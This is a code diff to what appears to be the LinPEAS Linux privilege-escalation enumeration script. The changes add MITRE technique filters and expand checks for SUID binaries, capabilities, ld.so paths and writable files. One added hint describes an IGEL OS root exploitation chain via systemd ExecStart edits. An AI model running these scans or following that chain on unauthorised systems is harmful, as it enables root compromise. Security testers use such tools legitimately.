"https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid" if ! [ "$STRINGS" ]; then echo_not_found "strings" @@ -7614,6 +10057,7 @@ if ! [ "$STRACE" ]; then fi suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) printf "%s\n" "$suids_files" | while read s; do + [ -z "$s" ] && continue s=$(ls -lahtr "$s") #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total"; then break; fi @@ -7627,14 +10071,14 @@ printf "%s\n" "$suids_files" | while read s; do else c="a" for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then + if echo "$sname" | grep -q $(echo $b | cut -d % -f 1); then echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," c="" break; fi done; if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + if echo "$sname" | grep -qE "$sidG1" || echo "$sname" | grep -qE "$sidG2" || echo "$sname" | grep -qE "$sidG3" || echo "$sname" | grep -qE "$sidG4" || echo "$sname" | grep -qE "$sidVB" || echo "$sname" | grep -qE "$sidVB2"; then echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," @@ -7648,6 +10092,8 @@ printf "%s\n" "$suids_files" | while read s; do if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" fi + elif echo "$sline_first" | grep -q "/" && [ -d "$(dirname "$sline_first")" ] && [ -w "$(dirname "$sline_first")" ]; then #If path does not exist but can be created + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can create it inside writable dir $RED$(dirname "$sline_first")$NC$ITALIC (strings line: $sline) (https://tinyurl.com/suidpath)\n" else #If not a path if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" @@ -7684,10 +10130,14 @@ printf "%s\n" "$suids_files" | while read s; do done; echo "" -print_2title "SGID" +fi + +if check_mitre_filter "T1548.001"; then +print_2title "SGID" "T1548.001" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid" sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) printf "%s\n" "$sgids_files" | while read s; do + [ -z "$s" ] && continue s=$(ls -lahtr "$s") #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total";then break; fi @@ -7722,6 +10172,8 @@ printf "%s\n" "$sgids_files" | while read s; do if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" fi + elif echo "$sline_first" | grep -q "/" && [ -d "$(dirname "$sline_first")" ] && [ -w "$(dirname "$sline_first")" ]; then #If path does not exist but can be created + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can create it inside writable dir $RED$(dirname "$sline_first")$NC$ITALIC (strings line: $sline)\n" else #If not a path if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" @@ -7758,79 +10210,97 @@ printf "%s\n" "$sgids_files" | while read s; do done; echo "" -print_2title "Files with ACLs (limited to 50)" +fi + +if check_mitre_filter "T1222"; then +print_2title "Files with ACLs (limited to 50)" "T1222" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls" if ! [ "$SEARCH_IN_FOLDER" ]; then - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g" else - ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g" fi if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl || echo -n '')" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$writeVB,${SED_RED_YELLOW},g" | sed -${E} "s,$writeB,${SED_RED},g" fi echo "" +fi + +if check_mitre_filter "T1548.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Capabilities" + print_2title "Capabilities" "T1548.001" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities" if [ "$(command -v capsh || echo -n '')" ]; then - print_3title "Current shell capabilities" - cat "/proc/$$/status" | grep Cap | while read -r cap_line; do - cap_name=$(echo "$cap_line" | awk '{print $1}') - cap_value=$(echo "$cap_line" | awk '{print $2}') - if [ "$cap_name" = "CapEff:" ]; then - # Add validation check for cap_value - # For more POSIX-compliant formatting, the following could be used instead: - # if echo "$cap_value" | grep -E '^[0-9a-fA-F]+$' > /dev/null 2>&1; then - if [[ "$cap_value" =~ ^[0-9a-fA-F]+$ ]]; then + is_hex_cap_value() { + case "$1" in + ""|*[!0-9a-fA-F]*) + return 1 + ;; + esac + return 0 + } + print_cap_status() { + cap_status_file="$1" + cap_default_sep="$2" + cat "$cap_status_file" | grep Cap | while read -r cap_line; do + cap_name=$(echo "$cap_line" | awk '{print $1}') + cap_value=$(echo "$cap_line" | awk '{print $2}') + cap_sep="$cap_default_sep" + cap_color="$SED_RED" + if [ "$cap_name" = "CapEff:" ]; then + cap_sep=" " + cap_color="$SED_RED_YELLOW" + fi + if is_hex_cap_value "$cap_value"; then # Memory errors can occur with certain values (e.g., ffffffffffffffff) # so we redirect stderr to prevent error propagation - echo "$cap_name $(capsh --decode=0x"$cap_value" 2>/dev/null | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" + echo "$cap_name$cap_sep$(capsh --decode=0x"$cap_value" 2>/dev/null | sed -${E} "s,$capsB,${cap_color},")" else - echo "$cap_name [Invalid capability format]" + echo "$cap_name$cap_sep[Invalid capability format]" fi - else - # Add validation check for cap_value - if [[ "$cap_value" =~ ^[0-9a-fA-F]+$ ]]; then - # Memory errors can occur with certain values (e.g., ffffffffffffffff) - # so we redirect stderr to prevent error propagation - echo "$cap_name $(capsh --decode=0x"$cap_value" 2>/dev/null | sed -${E} "s,$capsB,${SED_RED},")" - else - echo "$cap_name [Invalid capability format]" - fi - fi - done + done + } + print_3title "Current shell capabilities" "T1548.001" + print_cap_status "/proc/$$/status" " " echo "" print_info "Parent process capabilities" - cat "/proc/$PPID/status" | grep Cap | while read -r cap_line; do - cap_name=$(echo "$cap_line" | awk '{print $1}') - cap_value=$(echo "$cap_line" | awk '{print $2}') - if [ "$cap_name" = "CapEff:" ]; then - # Add validation check for cap_value - if [[ "$cap_value" =~ ^[0-9a-fA-F]+$ ]]; then - # Memory errors can occur with certain values (e.g., ffffffffffffffff) - # so we redirect stderr to prevent error propagation - echo "$cap_name $(capsh --decode=0x"$cap_value" 2>/dev/null | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" - else - echo "$cap_name [Invalid capability format]" - fi - else - # Add validation check for cap_value - if [[ "$cap_value" =~ ^[0-9a-fA-F]+$ ]]; then - # Memory errors can occur with certain values (e.g., ffffffffffffffff) - # so we redirect stderr to prevent error propagation - echo "$cap_name $(capsh --decode=0x"$cap_value" 2>/dev/null | sed -${E} "s,$capsB,${SED_RED},")" - else - echo "$cap_name [Invalid capability format]" - fi + print_cap_status "/proc/$PPID/status" " " + echo "" + print_3title "Processes with capability sets (non-zero CapEff/CapAmb, limit 40)" "T1548.001" + find /proc -maxdepth 2 -path "/proc/[0-9]*/status" 2>/dev/null | head -n 400 | while read -r proc_status; do + proc_pid=$(echo "$proc_status" | cut -d/ -f3) + proc_name=$(awk '/^Name:/{print $2}' "$proc_status" 2>/dev/null) + proc_uid=$(awk '/^Uid:/{print $2}' "$proc_status" 2>/dev/null) + user_name=$(awk -F: -v uid="$proc_uid" '$3==uid{print $1; exit}' /etc/passwd 2>/dev/null) + [ -z "$user_name" ] && user_name="$proc_uid" + proc_inh=$(awk '/^CapInh:/{print $2}' "$proc_status" 2>/dev/null) + proc_prm=$(awk '/^CapPrm:/{print $2}' "$proc_status" 2>/dev/null) + proc_eff=$(awk '/^CapEff:/{print $2}' "$proc_status" 2>/dev/null) + proc_bnd=$(awk '/^CapBnd:/{print $2}' "$proc_status" 2>/dev/null) + proc_amb=$(awk '/^CapAmb:/{print $2}' "$proc_status" 2>/dev/null) + [ -z "$proc_eff" ] && continue + if [ "$proc_eff" != "0000000000000000" ] || [ "$proc_amb" != "0000000000000000" ]; then + echo "PID $proc_pid ($proc_name) user=$user_name" + proc_inh_dec=$(capsh --decode=0x"$proc_inh" 2>/dev/null) + proc_prm_dec=$(capsh --decode=0x"$proc_prm" 2>/dev/null) + proc_eff_dec=$(capsh --decode=0x"$proc_eff" 2>/dev/null) + proc_bnd_dec=$(capsh --decode=0x"$proc_bnd" 2>/dev/null) + proc_amb_dec=$(capsh --decode=0x"$proc_amb" 2>/dev/null) + echo " CapInh: $proc_inh_dec" | sed -${E} "s,$capsB,${SED_RED},g" + echo " CapPrm: $proc_prm_dec" | sed -${E} "s,$capsB,${SED_RED},g" + echo " CapEff: $proc_eff_dec" | sed -${E} "s,$capsB,${SED_RED_YELLOW},g" + echo " CapBnd: $proc_bnd_dec" | sed -${E} "s,$capsB,${SED_RED},g" + echo " CapAmb: $proc_amb_dec" | sed -${E} "s,$capsB,${SED_RED_YELLOW},g" + echo "" fi - done + done | head -n 240 echo "" else - print_3title "Current shell capabilities" + print_3title "Current shell capabilities" "T1548.001" (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" echo "" - print_3title "Parent proc capabilities" + print_3title "Parent proc capabilities" "T1548.001" (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" echo "" fi @@ -7857,18 +10327,32 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi -if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then - print_2title "Users with capabilities" +fi + +if check_mitre_filter "T1548.001"; then +if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ] || grep -Rqs "pam_cap\.so" /etc/pam.d /etc/pam.conf 2>/dev/null; then + print_2title "Users with capabilities" "T1548.001" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities" if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed -${E} "s,$capsB,${SED_RED},g" else echo_not_found "/etc/security/capability.conf" fi echo "" + print_info "Checking if PAM loads pam_cap.so" + pam_cap_lines=$(grep -RIn "pam_cap\.so" /etc/pam.d /etc/pam.conf 2>/dev/null) + if [ "$pam_cap_lines" ]; then + printf "%s\n" "$pam_cap_lines" | sed -${E} "s,pam_cap\\.so,${SED_RED_YELLOW},g" + else + echo_not_found "pam_cap.so in /etc/pam.d or /etc/pam.conf" + fi + echo "" fi +fi + +if check_mitre_filter "T1574.006"; then if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then - print_2title "Checking misconfigurations of ld.so" + print_2title "Checking misconfigurations of ld.so" "T1574.006" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso" if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; @@ -7878,36 +10362,46 @@ if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then fi echo "Content of /etc/ld.so.conf:" cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - # Check each configured folder - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then + # Check each configured folder and include directives + cat /etc/ld.so.conf 2>/dev/null | while IFS= read -r l; do + l=$(echo "$l" | sed 's/#.*$//' | xargs 2>/dev/null) + [ -z "$l" ] && continue + if echo "$l" | grep -qE '^include[[:space:]]+'; then ini_path=$(echo "$l" | cut -d " " -f 2) fpath=$(dirname "$ini_path") - if [ -d "/etc/ld.so.conf" ] && [ -w "$fpath" ]; then - echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + if [ -d "$fpath" ] && [ -w "$fpath" ]; then + echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},"; printf $RED_YELLOW$ITALIC"$fpath\n"$NC; else printf $GREEN$ITALIC"$fpath\n"$NC; fi - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then - echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + if [ "$(find "$fpath" -type f '(' '(' -user "$USER" ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then + echo "You have write privileges over $(find "$fpath" -type f '(' '(' -user "$USER" ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - for f in $fpath/*; do - if [ -w "$f" ]; then - echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + for f in $ini_path; do + [ -f "$f" ] || continue + if [ -w "$f" ]; then + echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"; printf $RED_YELLOW$ITALIC"$f\n"$NC; else printf $GREEN$ITALIC" $f\n"$NC; fi - cat "$f" | grep -v "^#" | while read l2; do - if [ -f "$l2" ] && [ -w "$l2" ]; then - echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + cat "$f" 2>/dev/null | grep -v "^#" | while IFS= read -r l2; do + l2=$(echo "$l2" | xargs 2>/dev/null) + [ -z "$l2" ] && continue + if [ -d "$l2" ] && [ -w "$l2" ]; then + echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},"; printf $RED_YELLOW$ITALIC" - $l2\n"$NC; - else - echo $ITALIC" - $l2"$NC | sed -${E} "s,$l2,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; + elif [ -d "$l2" ]; then + echo $ITALIC" - $l2"$NC | sed -${E} "s,$ldsoconfdG,${SED_GREEN},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; fi done done + elif [ -d "$l" ] && [ -w "$l" ]; then + echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC"$l\n"$NC; + else + echo $ITALIC"$l"$NC | sed -${E} "s,$ldsoconfdG,${SED_GREEN},g" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; fi done echo "" @@ -7922,8 +10416,11 @@ if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then done fi +fi + +if check_mitre_filter "T1546.004"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Files (scripts) in /etc/profile.d/" + print_2title "Files (scripts) in /etc/profile.d/" "T1546.004" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files" if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" @@ -7933,8 +10430,11 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +fi + +if check_mitre_filter "T1543.002"; then if ! [ "$SEARCH_IN_FOLDER" ]; then -print_2title "Permissions in init, init.d, systemd, and rc.d" +print_2title "Permissions in init, init.d, systemd, and rc.d" "T1543.002" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd" if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS check_critial_root_path "/etc/init/" @@ -7948,14 +10448,20 @@ print_2title "Permissions in init, init.d, systemd, and rc.d" echo "" fi +fi + +if check_mitre_filter "T1518.001"; then if ! [ "$SEARCH_IN_FOLDER" ]; then if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then - print_2title "AppArmor binary profiles" + print_2title "AppArmor binary profiles" "T1518.001" ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\." echo "" fi fi +fi + +if check_mitre_filter "T1552.001"; then ##-- IPF) Hashes in passwd file if ! [ "$SEARCH_IN_FOLDER" ]; then print_list "Hashes inside passwd file? ........... " @@ -8002,29 +10508,41 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" fi +fi + +if check_mitre_filter "T1083"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching root files in home dirs (limit 30)" + print_2title "Searching root files in home dirs (limit 30)" "T1083" (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found echo "" fi +fi + +if check_mitre_filter "T1083"; then if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" + print_2title "Searching folders owned by me containing others files on it (limit 100)" "T1083" (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" ! -path "/sys/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec ls -l {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" fi +fi + +if check_mitre_filter "T1083"; then if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" + print_2title "Readable files belonging to root and readable by me but not world readable" "T1083" (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! -path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found echo "" fi +fi + +if check_mitre_filter "T1574.009,T1574.010"; then if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 200)" + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 200)" "T1574.009,T1574.010" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files" #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n 200) + obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "/dev/*" ! -path "/snap/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n 200) printf "%s\n" "$obmowbe" | while read l; do if echo "$l" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$l\n"$NC; elif echo "$l" | grep -qE "$writeVB"; then @@ -8036,8 +10554,11 @@ if ! [ "$IAMROOT" ]; then echo "" fi +fi + +if check_mitre_filter "T1574.009,T1574.010"; then if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 200)" + print_2title "Interesting GROUP writable files (not in Home) (max 200)" "T1574.009,T1574.010" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files" for g in $(groups); do iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n 200) @@ -8056,6 +10577,99 @@ if ! [ "$IAMROOT" ]; then echo "" fi +fi + +if check_mitre_filter "T1548.001"; then +igel_markers="" +igel_marker_sources="" +if [ -f /etc/os-release ] && grep -qi "igel" /etc/os-release 2>/dev/null; then + igel_markers="Yes" + igel_marker_sources="/etc/os-release" +fi +if [ -f /etc/issue ] && grep -qi "igel" /etc/issue 2>/dev/null; then + igel_markers="Yes" + igel_marker_sources="${igel_marker_sources} /etc/issue" +fi +for marker in /etc/igel /wfs/igel /userhome/.igel /config/sessions/igel; do + if [ -e "$marker" ]; then + igel_markers="Yes" + igel_marker_sources="${igel_marker_sources} $marker" + fi +done +igel_suid_hits="" +for candidate in /usr/bin/setup /bin/setup /usr/sbin/setup /opt/igel/bin/setup /usr/bin/date /bin/date /usr/lib/igel/date; do + if [ -u "$candidate" ]; then + igel_suid_hits="${igel_suid_hits}$(ls -lah "$candidate" 2>/dev/null)\n" + fi +done +if [ -n "$igel_markers" ] || [ -n "$igel_suid_hits" ]; then + print_2title "IGEL OS SUID setup/date privilege escalation surface" "T1548.001" + print_info "https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-11-28-2025" + if [ -n "$igel_markers" ]; then + echo "Potential IGEL OS detected via: $igel_marker_sources" | sed -${E} "s,.*,${SED_GREEN}," + else + echo "IGEL-specific SUID helpers found but IGEL markers were not detected" | sed -${E} "s,.*,${SED_RED}," + fi + if [ -n "$igel_suid_hits" ]; then + echo "SUID-root helpers exposing configuration primitives:" | sed -${E} "s,.*,${SED_RED_YELLOW}," + printf "%b" "$igel_suid_hits" + else + echo "No SUID setup/date binaries were located (system may be patched)." + fi + writable_nm="" + writable_systemd="" + if ! [ "$SUPERFAST" ]; then + if [ -d /etc/NetworkManager ]; then + writable_nm=$(find /etc/NetworkManager -maxdepth 3 -type f -writable 2>/dev/null | head -n 25) + fi + for unitdir in /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system; do + if [ -d "$unitdir" ]; then + tmp_units=$(find "$unitdir" -maxdepth 2 -type f -writable 2>/dev/null | head -n 15) + if [ -n "$tmp_units" ]; then + writable_systemd="${writable_systemd}${tmp_units}\n" + fi + fi + done + fi + if [ -n "$writable_nm" ]; then + echo "Writable NetworkManager profiles/hooks (swap Exec path to your payload):" | sed -${E} "s,.*,${SED_RED_YELLOW}," + echo "$writable_nm" + fi + if [ -n "$writable_systemd" ]; then + echo "Writable systemd unit files (edit ExecStart, then restart via setup/date):" | sed -${E} "s,.*,${SED_RED_YELLOW}," + printf "%b" "$writable_systemd" + fi + printf "$ITALIC Known exploitation chain: Use the SUID setup/date binaries to edit NetworkManager or systemd configs so ExecStart points to your payload, then trigger a service restart via the same helper to run as root (Metasploit linux/local/igel_network_priv_esc).$NC\n" +fi +echo "" + +fi + +if check_mitre_filter "T1574.009,T1574.010"; then +if ! [ "$IAMROOT" ]; then + print_2title "Writable root-owned executables I can modify (max 200)" "T1574.009,T1574.010" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files" + writable_root_execs=$( + find "$ROOT_FOLDER" -type f -user root -perm -u=x \ + \( -perm -g=w -o -perm -o=w \) \ + ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/snap/*" ! -path "$HOME/*" 2>/dev/null \ + | while IFS= read -r f; do + if [ -w "$f" ]; then + ls -l "$f" 2>/dev/null + fi + done | head -n 200 + ) + if [ "$writable_root_execs" ] || [ "$DEBUG" ]; then + printf "%s\n" "$writable_root_execs" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo_not_found "Writable root-owned executables" + fi + echo "" +fi + +fi + +fi fi echo '' @@ -8063,9 +10677,11 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q interesting_files; then +if check_mitre_filter "T1552.001,T1114.001,T1005,T1564.001,T1574.007,T1083,T1552.007,T1082,T1204.002,T1070.002"; then print_title "Other Interesting Files" +if check_mitre_filter "T1574.007"; then if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title ".sh files in path" + print_2title ".sh files in path" "T1574.007" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path" echo $PATH | tr ":" "\n" | while read d; do for f in $(find "$d" -name "*.sh" -o -name "*.sh.*" 2>/dev/null); do @@ -8081,7 +10697,7 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then echo "" broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) if [ "$broken_links" ] || [ "$DEBUG" ]; then - print_2title "Broken links in path" + print_2title "Broken links in path" "T1574.007" echo $PATH | tr ":" "\n" | while read d; 